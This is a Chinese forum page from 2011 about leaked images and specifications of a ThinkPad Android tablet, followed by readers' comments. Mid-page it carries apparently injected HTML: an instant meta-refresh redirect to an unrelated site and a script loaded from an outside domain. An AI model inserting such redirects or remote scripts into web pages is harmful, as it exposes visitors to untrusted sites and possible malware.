开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

ThinkPad的平板示意图出现:Android3.0+IPS屏幕

我们之前听说的关于ThinkPad平板看来是真有此事,今天曝光的一些图片显示,这款产品真的存在(不过官方没有确认信息),资料显示该平板电脑将配备10.1英寸IPS屏,有16GB/32GB/64GB等3种容量供选择,起售价499美元,将在7月份发布,型号可能是"X Slate"。 ThinkPad平板电脑将采用10.1英寸WXGA(1280×800)IPS屏幕;搭载NVIDIA Tegra 2处理器、预装Android 3.0系统;支持电子笔输入(非标配);具备8小时续航能力。接口方面,ThinkPad平板配备了USB2.0/Micro USB/3合一读卡器/Mini HDMI等。支持WiFi和3G,12mm厚,726克,感觉过去有小黑的气质。同时还有一个键盘底座。

这下ThinkPad真的加入平板大军了,小黑迷们,你们高兴么?不过最终的样子和规格联想官方还没有确定,2009年的水印让我们有点模糊,为啥不用 Tegra T25 呢?最好推出来的时候,高端配置也要跟上,大家等等吧。

<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

平板无爱,弄不清平板电脑的定位到底是什么
没米,只能一地口水
依然保留小红点啊~
太丑了。。
希望早点上市
回复 黑色幽默 的帖子

对我来电说就是在躺在床上或者厕所里不那么无聊还比笔记本轻便的东西
收发个邮件 看些资料 游戏机 平板电脑的定位
huangwhuang 发表于 2011-4-25 12:24
依然保留小红点啊~

哪里?触摸要红点作甚
黑音 发表于 2011-4-25 13:37
哪里?触摸要红点作甚

背面,右上角,大概是电源键吧~
黑音 发表于 2011-4-25 13:11
回复 黑色幽默 的帖子

对我来电说就是在躺在床上或者厕所里不那么无聊还比笔记本轻便的东西 ...

周六去xy没跟你认识一下呢~
黑音 发表于 2011-4-25 13:11
回复 黑色幽默 的帖子

对我来电说就是在躺在床上或者厕所里不那么无聊还比笔记本轻便的东西 ...

我更喜欢躺床上玩手机或者掌机,平板就大块了点,拿在手里拉屎用不上力
现在出差都嫌电子产品太多懒得带了,笔记本必带,笔记本的包,加上装东西的包就够我拿的了,顶多塞个NDS或者PSP进去,还要带一堆的充电器
不看好。。。
连这个市场也要抢
安卓3.0?
不错不错!!!  猛本
上市的话一定买个
不能去掉那几个字母么
我对平板很有爱,但是thinkpad这种有很浓厚企业风格的公司搭配统一的android系统,不是一个好选择吧。
我不会为了一个看起来像thinkpad的东西用起来却又不像thinkpad的东西付费。
希望是假新闻
肯定很贵,没什么意思
还不如买的低端的X系列呢
还有一支笔?
感觉像联想乐PAD换了一个外壳,就连那个底座键盘都看着眼熟。
肯定是插在底座上能切换成WIN7......